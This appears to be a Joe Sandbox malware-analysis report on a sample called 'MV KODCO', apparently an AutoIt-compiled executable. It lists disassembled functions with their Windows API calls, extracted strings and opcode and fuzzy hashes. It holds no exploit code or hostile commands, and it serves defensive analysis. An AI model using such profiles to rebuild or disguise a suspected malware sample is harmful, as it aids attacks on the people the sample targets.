                                                          • Opcode ID: 0166960b076f569bb674e0e501794a98a500f736a43db6bd3d2b3a1cc95ee821
                                                          • Instruction ID: 110599b1233cbac8bf4ac79b214f64d0504fdff7c8f3900f530f52858227b7a1
                                                          • Opcode Fuzzy Hash: 0166960b076f569bb674e0e501794a98a500f736a43db6bd3d2b3a1cc95ee821
                                                          • Instruction Fuzzy Hash: A1A1A1742043469BCB18EF10C855ABABBA7BF85310F14496DB9969B3D2DF30EC06CB52
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0061CF91
                                                          • __swprintf.LIBCMT ref: 0061D032
                                                          • _wcscmp.LIBCMT ref: 0061D045
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0061D09A
                                                          • _wcscmp.LIBCMT ref: 0061D0D6
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0061D10D
                                                          • GetDlgCtrlID.USER32(?), ref: 0061D15F
                                                          • GetWindowRect.USER32(?,?), ref: 0061D195
                                                          • GetParent.USER32(?), ref: 0061D1B3
                                                          • ScreenToClient.USER32(00000000), ref: 0061D1BA
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0061D234
                                                          • _wcscmp.LIBCMT ref: 0061D248
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0061D26E
                                                          • _wcscmp.LIBCMT ref: 0061D282
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                          • String ID: %s%u
                                                          • API String ID: 3119225716-679674701
                                                          • Opcode ID: 47295462a0d65a4ebbdb4fde5f3401c07fc57d130c717fa3417d1ffdef57b3f2
                                                          • Instruction ID: 5cb3a966806413465ae99d2b742639610aa032c1aab7d54b1c1c0112e19a443c
                                                          • Opcode Fuzzy Hash: 47295462a0d65a4ebbdb4fde5f3401c07fc57d130c717fa3417d1ffdef57b3f2
                                                          • Instruction Fuzzy Hash: 1DA1D571604702AFD715DF64C884FEAB7AAFF44354F048519FAA9D2290DB30EA86CB91
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0061D8EB
                                                          • _wcscmp.LIBCMT ref: 0061D8FC
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0061D924
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0061D941
                                                          • _wcscmp.LIBCMT ref: 0061D95F
                                                          • _wcsstr.LIBCMT ref: 0061D970
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0061D9A8
                                                          • _wcscmp.LIBCMT ref: 0061D9B8
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0061D9DF
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0061DA28
                                                          • _wcscmp.LIBCMT ref: 0061DA38
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0061DA60
                                                          • GetWindowRect.USER32(00000004,?), ref: 0061DAC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 460d6502e91757d2865a15d862892f72e5c8a4efe08a6c4dc8763e812dd2cda0
                                                          • Instruction ID: 9d7a073079b260f7b5acadb19bb273bd7d1bb36dd78a3e04b91f7ac6387b3688
                                                          • Opcode Fuzzy Hash: 460d6502e91757d2865a15d862892f72e5c8a4efe08a6c4dc8763e812dd2cda0
                                                          • Instruction Fuzzy Hash: BD81C2711083459BDB05CF10C885FEA7BEAFF84314F088469FD8A9A195DB70ED85CBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 384253b8acaff66f4eee3dc4d4913ee3f6d96bd483d086b2f8f663a4648082d0
                                                          • Instruction ID: e32309effd7109d7b364572808e72cd9b37b698d6fe646b5f1bf953135a28bbd
                                                          • Opcode Fuzzy Hash: 384253b8acaff66f4eee3dc4d4913ee3f6d96bd483d086b2f8f663a4648082d0
                                                          • Instruction Fuzzy Hash: 2031CF31A44247F6DF58FA11CD63FEEB7BBAF20784F200029F481B14D5EB51AA45C665
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 0061EAB0
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0061EAC2
                                                          • SetWindowTextW.USER32(?,?), ref: 0061EAD9
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0061EAEE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0061EAF4
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0061EB04
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0061EB0A
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0061EB2B
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0061EB45
                                                          • GetWindowRect.USER32(?,?), ref: 0061EB4E
                                                          • SetWindowTextW.USER32(?,?), ref: 0061EBB9
                                                          • GetDesktopWindow.USER32 ref: 0061EBBF
                                                          • GetWindowRect.USER32(00000000), ref: 0061EBC6
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0061EC12
                                                          • GetClientRect.USER32(?,?), ref: 0061EC1F
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0061EC44
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0061EC6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: b65fec7ee89056133adae7b1bf2d01253f63d4cabeb7618594109808cfa0c3dd
                                                          • Instruction ID: ad9f81f4cd4841003e1ab0c1b71ecb5cf27885a2f3ddeca2649cf70ebad2ea08
                                                          • Opcode Fuzzy Hash: b65fec7ee89056133adae7b1bf2d01253f63d4cabeb7618594109808cfa0c3dd
                                                          • Instruction Fuzzy Hash: B1513E71A00709AFDB209FA9CE89FAEBBF6FF04704F044918E556A26A0C775F944CB50
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 006379C6
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 006379D1
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 006379DC
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 006379E7
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 006379F2
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 006379FD
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00637A08
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00637A13
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00637A1E
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00637A29
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00637A34
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00637A3F
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00637A4A
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00637A55
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00637A60
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00637A6B
                                                          • GetCursorInfo.USER32(?), ref: 00637A7B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: 38b05820156eccd1aefcde3d41018e3b6fb8b7df01d0d56650ff0671b62734a2
                                                          • Instruction ID: 5b1b1cb9fc4ce5bdbe3ae792cb7cf48f0d20411d6da84c56d6f56f2ebfb30104
                                                          • Opcode Fuzzy Hash: 38b05820156eccd1aefcde3d41018e3b6fb8b7df01d0d56650ff0671b62734a2
                                                          • Instruction Fuzzy Hash: 86313AF0D0831E6ADB609FB68C8999FBFE9FF04750F504526E50DE7280DA78A5008F91
                                                          APIs
                                                            • Part of subcall function 005FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005EC8B7,?,00002000,?,?,00000000,?,005E419E,?,?,?,0067DC00), ref: 005FE984
                                                            • Part of subcall function 005E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E53B1,?,?,005E61FF,?,00000000,00000001,00000000), ref: 005E662F
                                                          • __wsplitpath.LIBCMT ref: 005EC93E
                                                            • Part of subcall function 00601DFC: __wsplitpath_helper.LIBCMT ref: 00601E3C
                                                          • _wcscpy.LIBCMT ref: 005EC953
                                                          • _wcscat.LIBCMT ref: 005EC968
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005EC978
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 005ECABE
                                                            • Part of subcall function 005EB337: _wcscpy.LIBCMT ref: 005EB36F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 2258743419-1018226102
                                                          • Opcode ID: 060e06e61bdf087a91e925ca1e7eb7ff540504eb6a53e623069f5dfe34d92f70
                                                          • Instruction ID: b7cf4c6e4c42d3fb70a21c80a342fe309ca2bc8166a49cf7aa0817c5456b4c6b
                                                          • Opcode Fuzzy Hash: 060e06e61bdf087a91e925ca1e7eb7ff540504eb6a53e623069f5dfe34d92f70
                                                          • Instruction Fuzzy Hash: 44129C715083829BC728EF25C845AAFBBE6BFC9740F40492DF9C997251DB30DA49CB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 0064CEFB
                                                          • DestroyWindow.USER32(?,?), ref: 0064CF73
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0064CFF4
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0064D016
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0064D025
                                                          • DestroyWindow.USER32(?), ref: 0064D042
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005E0000,00000000), ref: 0064D075
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0064D094
                                                          • GetDesktopWindow.USER32 ref: 0064D0A9
                                                          • GetWindowRect.USER32(00000000), ref: 0064D0B0
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0064D0C2
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0064D0DA
                                                            • Part of subcall function 005FB526: GetWindowLongW.USER32(?,000000EB), ref: 005FB537
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 3877571568-3619404913
                                                          • Opcode ID: 6b0652b7188fa14481e7826296e6c0ff36306a9d7cc4a79decca2c3d4cafc03d
                                                          • Instruction ID: fe64212d37ae1dae3a1e2eaf72d8849e513d8b4d775219052a067af8050690cb
                                                          • Opcode Fuzzy Hash: 6b0652b7188fa14481e7826296e6c0ff36306a9d7cc4a79decca2c3d4cafc03d
                                                          • Instruction Fuzzy Hash: F771CF70A40305AFD724DF28CC85FA67BE6EB89B44F04551DF9858B3A1D771E942CB22
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • DragQueryPoint.SHELL32(?,?), ref: 0064F37A
                                                            • Part of subcall function 0064D7DE: ClientToScreen.USER32(?,?), ref: 0064D807
                                                            • Part of subcall function 0064D7DE: GetWindowRect.USER32(?,?), ref: 0064D87D
                                                            • Part of subcall function 0064D7DE: PtInRect.USER32(?,?,0064ED5A), ref: 0064D88D
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0064F3E3
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0064F3EE
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0064F411
                                                          • _wcscat.LIBCMT ref: 0064F441
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0064F458
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0064F471
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0064F488
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0064F4AA
                                                          • DragFinish.SHELL32(?), ref: 0064F4B1
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0064F59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: 62acea9542a0505730bd45b43023f6d95a27a0b3491ba936994882b62b07dea5
                                                          • Instruction ID: 5c2d994fa5f2e644f646b394abfbfae0e0d7cdf53303beb908c74cf2c968ed16
                                                          • Opcode Fuzzy Hash: 62acea9542a0505730bd45b43023f6d95a27a0b3491ba936994882b62b07dea5
                                                          • Instruction Fuzzy Hash: B6615971508341AFC705EF65CC89DAFBBF9BF89710F000A1EF595961A1DB70AA09CB52
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 0062AB3D
                                                          • VariantCopy.OLEAUT32(?,?), ref: 0062AB46
                                                          • VariantClear.OLEAUT32(?), ref: 0062AB52
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0062AC40
                                                          • __swprintf.LIBCMT ref: 0062AC70
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0062AC9C
                                                          • VariantInit.OLEAUT32(?), ref: 0062AD4D
                                                          • SysFreeString.OLEAUT32(00000016), ref: 0062ADDF
                                                          • VariantClear.OLEAUT32(?), ref: 0062AE35
                                                          • VariantClear.OLEAUT32(?), ref: 0062AE44
                                                          • VariantInit.OLEAUT32(00000000), ref: 0062AE80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 3730832054-3931177956
                                                          • Opcode ID: 8e871eeb818a14934e2296cc3f7109be9df56284ad6c64a2f8b7a033e179efde
                                                          • Instruction ID: 9d3e876e58b071b392faa070623f5f3f3a01f322083159085df60c29649f1b8c
                                                          • Opcode Fuzzy Hash: 8e871eeb818a14934e2296cc3f7109be9df56284ad6c64a2f8b7a033e179efde
                                                          • Instruction Fuzzy Hash: 25D12671A00A26DBDB109F95E884BBDBBB7FF44B01F148495E4159B280DBB4DC41DFA2
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 006471FC
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00647247
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: a099b562b880d1939374ada24fc23ca0486ce0a775b117e94cffcedfa4b371bc
                                                          • Instruction ID: d10d821dc7eaaccc8892ceaf390ddb15d17c2734da535e79baba6af764c8951c
                                                          • Opcode Fuzzy Hash: a099b562b880d1939374ada24fc23ca0486ce0a775b117e94cffcedfa4b371bc
                                                          • Instruction Fuzzy Hash: 4991A3342047429BCB04EF10C855AAEBBE6BF94350F04486CF9965B3A3DB74ED4ACB81
                                                          APIs
                                                          • EnumChildWindows.USER32(?,0061CF50), ref: 0061CE90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: 4+i$CLASS$CLASSNN$H+i$INSTANCE$L+i$NAME$P+i$REGEXPCLASS$T+i$TEXT
                                                          • API String ID: 3555792229-492211615
                                                          • Opcode ID: db80d430ef8d6e072076eae55963a133e9a2cfe493565faf4f9bbf00cd10d82f
                                                          • Instruction ID: 813156bce29bb7dd25ef55fb09c07b0aa65c216f9d3016cdd3ec46ce71b2528d
                                                          • Opcode Fuzzy Hash: db80d430ef8d6e072076eae55963a133e9a2cfe493565faf4f9bbf00cd10d82f
                                                          • Instruction Fuzzy Hash: B5919230A40606AACB18DF60C482BEEFF76BF44354F588529E549A7291DF30699ADBD0
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0064E5AB
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00649808,?), ref: 0064E607
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0064E647
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0064E68C
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0064E6C3
                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00649808,?), ref: 0064E6CF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0064E6DF
                                                          • DestroyIcon.USER32(?), ref: 0064E6EE
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0064E70B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0064E717
                                                            • Part of subcall function 00600FA7: __wcsicmp_l.LIBCMT ref: 00601030
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 3e604b8bfd2f5e16b8fa6ef94938f4595a8ef7b9798329865178adb3d6c73517
                                                          • Instruction ID: 3c03f7eea7eb809e6e70256e885498d61c8c026703873b1ed3266c2f9f391a66
                                                          • Opcode Fuzzy Hash: 3e604b8bfd2f5e16b8fa6ef94938f4595a8ef7b9798329865178adb3d6c73517
                                                          • Instruction Fuzzy Hash: 2061C071A40615FEEB28DF64CC46FFE7BAABB18724F104105F915D61D1EBB1A980CBA0
                                                          APIs
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • CharLowerBuffW.USER32(?,?), ref: 0062D292
                                                          • GetDriveTypeW.KERNEL32 ref: 0062D2DF
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0062D327
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0062D35E
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0062D38C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
